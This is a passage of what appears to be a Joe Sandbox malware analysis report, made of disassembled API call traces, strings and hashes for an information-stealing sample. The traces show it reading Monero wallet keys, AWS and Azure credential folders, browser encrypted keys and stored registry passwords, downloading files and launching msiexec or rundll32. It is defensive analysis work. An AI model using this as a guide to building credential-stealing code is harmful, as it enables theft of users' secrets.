                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                              • Instruction ID: 242705127d79173be2e7755ded0450c764b67662c7be961f13c8b58c1683e81a
                              • Opcode Fuzzy Hash: 605e2cbfab5fde44456cb7a41a5fe921397304998a80f305f2f629f3f56ecaf9
                              • Instruction Fuzzy Hash: E112EA72950118AAEB19EB90DCA2FEEB378FF94304F514199B10663191EF702F49CF66
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,010FCE60,00000000,?,0095144C,00000000,?,?), ref: 0093CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0093CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0093CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0093CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0093CAD9
                              • StrStrA.SHLWAPI(?,010FCE78,00950B52), ref: 0093CAF7
                              • StrStrA.SHLWAPI(00000000,010FCEA8), ref: 0093CB1E
                              • StrStrA.SHLWAPI(?,010FCFC0,00000000,?,00951458,00000000,?,00000000,00000000,?,010F87D8,00000000,?,00951454,00000000,?), ref: 0093CCA2
                              • StrStrA.SHLWAPI(00000000,010FD040), ref: 0093CCB9
                                • Part of subcall function 0093C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                • Part of subcall function 0093C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                              • StrStrA.SHLWAPI(?,010FD040,00000000,?,0095145C,00000000,?,00000000,010F8998), ref: 0093CD5A
                              • StrStrA.SHLWAPI(00000000,010F8B98), ref: 0093CD71
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                                • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                              • lstrlen.KERNEL32(00000000), ref: 0093CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0093CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 1194155d6719928ac2a34b0e923b0aaf61652d5a27d8c6c92debb3fbdb58e2d3
                              • Instruction ID: fb0f8a0bed91724475b8967dc5d5b5c5b98781a3eaa913f7802fe3aaa6a01899
                              • Opcode Fuzzy Hash: 1194155d6719928ac2a34b0e923b0aaf61652d5a27d8c6c92debb3fbdb58e2d3
                              • Instruction Fuzzy Hash: 02E10D71950108ABEB14EBA0DC92FEEB778EF94304F404159F506B7191EF306A8ACF66
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • RegOpenKeyExA.ADVAPI32(00000000,010FAF08,00000000,00020019,00000000,009505B6), ref: 009483A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                              • wsprintfA.USER32 ref: 00948459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                              • Instruction ID: d955f196088392a036599b3452d2b94729232716021fdcc36357fa3a3035eb42
                              • Opcode Fuzzy Hash: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                              • Instruction Fuzzy Hash: 09812BB1950118ABEB68DF54CC91FEEB7B8FF88704F008298E109A6180DF706B85CF95
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00944DCD
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                              • lstrcat.KERNEL32(?,00000000), ref: 00944E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00944E59
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00944EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00944EE5
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449B0
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,009508D2), ref: 009449C5
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449E2
                                • Part of subcall function 00944910: PathMatchSpecA.SHLWAPI(?,?), ref: 00944A1E
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,010FE278), ref: 00944A4A
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FF8), ref: 00944A5C
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A70
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FFC), ref: 00944A82
                                • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A96
                                • Part of subcall function 00944910: CopyFileA.KERNEL32(?,?,00000001), ref: 00944AAC
                                • Part of subcall function 00944910: DeleteFileA.KERNEL32(?), ref: 00944B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 7d94b0a59b46616ef3d5bc1f12dc814a851f815577c0c8685937defa1a9c410a
                              • Instruction ID: 16a60798d29ef437ec3cd46ed02c4efe105f14871bd82567acc28012feaedaf1
                              • Opcode Fuzzy Hash: 7d94b0a59b46616ef3d5bc1f12dc814a851f815577c0c8685937defa1a9c410a
                              • Instruction Fuzzy Hash: A24163BA94020467DB54F770EC47FEE7338ABE4705F404594B689660C1EEB46BCD8B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                              • Instruction ID: ffdebac5cb52f7b8db60e5fc83bd1f4f962d87bf221f5c12ee654be320677bba
                              • Opcode Fuzzy Hash: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                              • Instruction Fuzzy Hash: C471EE71910208ABDB44EFE4DC89FEEB7B9BF88700F108508F51AA7290DF74A945CB61
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009431C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0094335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009434EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                              • Instruction ID: 2cbdb4b7556286c8c9c3673ed750da3b511fb047730361caf4a37aad55bcf0d2
                              • Opcode Fuzzy Hash: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                              • Instruction Fuzzy Hash: C3120C71850108AAEB19FBA0DC92FEEB738EF94304F504159F50676191EF342B4ACFA6
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                                • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                                • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                              • lstrlen.KERNEL32(00000000), ref: 0094532F
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                              • lstrlen.KERNEL32(00000000), ref: 00945383
                              • lstrlen.KERNEL32(00000000), ref: 009453AE
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: be298c94f833d237147c5ce85efde67777f814504477fa339b9d42632cda8eec
                              • Instruction ID: fb3d01f20dea2da07c677fee815602443e987bffa6ca4497cf6642e3eacdb519
                              • Opcode Fuzzy Hash: be298c94f833d237147c5ce85efde67777f814504477fa339b9d42632cda8eec
                              • Instruction Fuzzy Hash: C651FB309501489BEB18FF60C992FED7779EF90309F514018F80A6A5A2EF346B46CB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 952d96ea43c9f49033cb802b94dddbc481b8d5d7c50ee60f6902798e8aaf745a
                              • Instruction ID: 0fc91252a703bb34391687ca08ea2e873492b716bbd97822d2d0677c06497b17
                              • Opcode Fuzzy Hash: 952d96ea43c9f49033cb802b94dddbc481b8d5d7c50ee60f6902798e8aaf745a
                              • Instruction Fuzzy Hash: 5DC173B59402199BCB14EF60DC89FEE7379BB94304F004598F50AA7281EE74AA85CF91
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009442EC
                              • lstrcat.KERNEL32(?,010FDE88), ref: 0094430B
                              • lstrcat.KERNEL32(?,?), ref: 0094431F
                              • lstrcat.KERNEL32(?,010FCDB8), ref: 00944333
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                • Part of subcall function 00939CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 009493C0: GlobalAlloc.KERNEL32(00000000,009443DD,009443DD), ref: 009493D3
                              • StrStrA.SHLWAPI(?,010FDDC8), ref: 009443F3
                              • GlobalFree.KERNEL32(?), ref: 00944512
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 009444A3
                              • StrCmpCA.SHLWAPI(?,009508D1), ref: 009444C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009444D2
                              • lstrcat.KERNEL32(00000000,?), ref: 009444E5
                              • lstrcat.KERNEL32(00000000,00950FB8), ref: 009444F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 2ea43394b36bb1df6742fe693ee49e928abf444dd662ebd77e3b163bcba05069
                              • Instruction ID: 2f21cc7a1483dfff5fc54ba8897c88a74d38d6e636eaffbccdb7632a5dda490f
                              • Opcode Fuzzy Hash: 2ea43394b36bb1df6742fe693ee49e928abf444dd662ebd77e3b163bcba05069
                              • Instruction Fuzzy Hash: D57115B6D10208ABDB14EBA0DC85FEE7379ABC8304F044598F61997181EE75DB45CF92
                              APIs
                                • Part of subcall function 009312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                • Part of subcall function 009312A0: RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                • Part of subcall function 009312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                • Part of subcall function 009312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                • Part of subcall function 009312A0: RegCloseKey.ADVAPI32(?), ref: 009312FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0093134F
                              • lstrlen.KERNEL32(?), ref: 0093135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00931377
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00931465
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 009314EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 57e141289a13684a2b56587d91fefe5f3ede4f2456503dc0db95326e1b269938
                              • Instruction ID: abd5d21e75ce17a531c5bc4423dc8a8d6614c05a966222d69f0de9fa53707bd4
                              • Opcode Fuzzy Hash: 57e141289a13684a2b56587d91fefe5f3ede4f2456503dc0db95326e1b269938
                              • Instruction Fuzzy Hash: 7F5154B1D501195BDB15FB60DD92FED733CEF94304F404198B60AA2092EE306B89CFA6
                              APIs
                                • Part of subcall function 009372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                • Part of subcall function 009372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                • Part of subcall function 009372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                • Part of subcall function 009372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                • Part of subcall function 009372D0: HeapFree.KERNEL32(00000000), ref: 00937459
                              • lstrcat.KERNEL32(00000000,009517FC), ref: 00937606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00937648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0093765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0093768F
                              • lstrcat.KERNEL32(00000000,00951804), ref: 009376A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009376D3
                              • lstrcat.KERNEL32(00000000,00951808), ref: 009376ED
                              • task.LIBCPMTD ref: 009376FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                              • Instruction ID: 5ec647a6c582a957a27727c0308984f9cfbf438bdb31aee4b8468788b4cf05a7
                              • Opcode Fuzzy Hash: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                              • Instruction Fuzzy Hash: EA3169B1900209DBCB48EBE4DC96EEFB378ABC5706F104408F116A7290DE34A986CF52
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                              • InternetOpenA.WININET(00950DF7,00000001,00000000,00000000,00000000), ref: 0093610F
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00936147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0093618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009361B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009361DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00936249
                              • InternetCloseHandle.WININET(?), ref: 00936253
                              • InternetCloseHandle.WININET(00000000), ref: 00936260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
